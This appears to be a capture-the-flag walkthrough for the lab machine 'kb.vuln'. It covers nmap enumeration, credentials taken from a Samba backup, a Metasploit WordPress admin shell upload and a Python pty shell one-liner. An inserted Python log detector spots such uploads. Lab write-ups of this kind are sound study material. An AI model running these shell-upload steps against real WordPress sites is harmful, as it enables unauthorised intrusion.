#Make sure to add the machine's address to the hosts file.
$nmap -sV kb.vuln
Nmap scan report for kb.vuln (192.168.1.6)
Host is up (0.00031s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: UBUNTU; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Tried anonymous login over FTP, but it doesn't work. Port 80 is also open, so ran dirb and got the following result.
Tried brute-forcing the WordPress login, but no luck. Then noticed the Samba service and dug into it at smb://kb.vuln, and got a username and password in backup.zip, which contains remerber_me.txt.
Now that we have credentials, there are different ways to upload a backdoor. Here is one of the simplest ways to upload a shell, using metasploit-framework.
msf> use exploit/unix/webapp/wp_admin_shell_upload
msf> show options
msf> set rhosts kb.vuln //set all the required options
msf> run
Got a shell! The first flag is in the kbadmin folder, which is readable as the www-data user, and we already have the credentials kbadmin:MachineBoy141.
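From the web server's side, the plugin-upload step above leaves a recognizable pattern in the Apache access log. The following is an added example, not part of the original write-up: it assumes the standard WordPress flow (a POST to /wp-admin/update.php?action=upload-plugin followed by a direct request to a PHP file under /wp-content/plugins/), and the log lines, IP addresses, plugin names and the 60-second window are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format (not taken from the target).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2020:13:55:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2020:13:55:03 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Oct/2020:13:55:04 +0000] "GET /wp-content/plugins/qzxwvk/lmnopq.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2020:14:02:11 +0000] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 403 199 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2020:15:00:00 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2020:15:20:00 +0000] "GET /wp-content/plugins/contact-form/readme.txt HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_RE = re.compile(r'^/wp-admin/update\.php\?(?:.*&)?action=upload-plugin(?:&|$)')
PLUGIN_PHP_RE = re.compile(r'^/wp-content/plugins/[^/]+/[^/?]+\.php(?:\?|$)')

def find_plugin_shell_uploads(log_text, window=timedelta(seconds=60)):
    """Return (ip, upload_time, php_path) for each plugin upload followed within
    `window` by a successful direct hit on a plugin PHP file from the same IP."""
    pending = {}  # ip -> time of that client's most recent plugin upload
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, ts, method, path, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and UPLOAD_RE.match(path) and status == "200":
            pending[ip] = when
        elif ip in pending and PLUGIN_PHP_RE.match(path) and status == "200":
            # Legitimate installs rarely request a plugin's PHP file directly
            # seconds after upload; treat the pair as suspicious.
            if when - pending[ip] <= window:
                alerts.append((ip, pending[ip].isoformat(), path))
            del pending[ip]
    return alerts

if __name__ == "__main__":
    for ip, when, path in find_plugin_shell_uploads(SAMPLE_LOG):
        print(f"ALERT {ip} uploaded a plugin at {when} then requested {path}")
```
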
Use Python to get a TTY:
python -c 'import pty; pty.spawn("/bin/sh")'
cd /home/kbadmin
and got the user flag.
For root, simply tried sudo -l